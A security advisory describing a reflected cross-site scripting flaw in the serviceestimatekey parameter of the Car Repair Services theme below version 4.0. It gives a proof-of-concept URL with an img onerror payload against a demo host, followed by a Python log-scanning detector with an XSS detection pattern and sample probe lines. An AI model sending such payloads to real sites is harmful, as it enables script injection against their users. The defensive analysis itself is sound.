Car Repair Services < 4.0 - Unauthenticated Reflected XSS & XFS
Description
The theme did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue.
Proof of Concept
https://smartdata.tonytemplates.com/car-repair-service-v4/car1/estimateresult/result?s=&serviceestimatekey=<img+src%3Dx+onerror%3Dalert(`m0ze`)%3B>
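A detection check for this issue, added here as an example and not part of the original advisory: it scans web access-log lines for requests whose serviceestimatekey value decodes to markup or event-handler syntax. The combined log format, the sample lines and the set of disallowed characters are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "serviceestimatekey"  # parameter named in the advisory

# Assumption: an estimate search key never legitimately contains markup
# characters, inline event handlers or a javascript: scheme.
SUSPICIOUS = re.compile(r"""[<>"'`]|\bon\w+\s*=|javascript:""", re.IGNORECASE)

# Request line as it appears in common/combined access-log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def flag_request(log_line):
    """Return the decoded PARAM value if it looks like an XSS probe, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qs percent-decodes and maps '+' to space, as the server would.
    for value in parse_qs(query, keep_blank_values=True).get(PARAM, []):
        if SUSPICIOUS.search(value):
            return value
    return None


def scan(lines):
    """Return (line_index, decoded_value) for every flagged log line."""
    hits = []
    for index, line in enumerate(lines):
        value = flag_request(line)
        if value is not None:
            hits.append((index, value))
    return hits


# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /car1/estimateresult/result?s=&serviceestimatekey=brakes HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /car1/estimateresult/result?s=&serviceestimatekey=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E HTTP/1.1" 200 5200',
    '203.0.113.7 - - [01/Jan/2021:10:00:09 +0000] "GET /car1/contact?name=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: suspicious {PARAM} value: {value!r}")
```

Matching on the decoded value rather than the raw request line keeps the check independent of how the markup was percent-encoded.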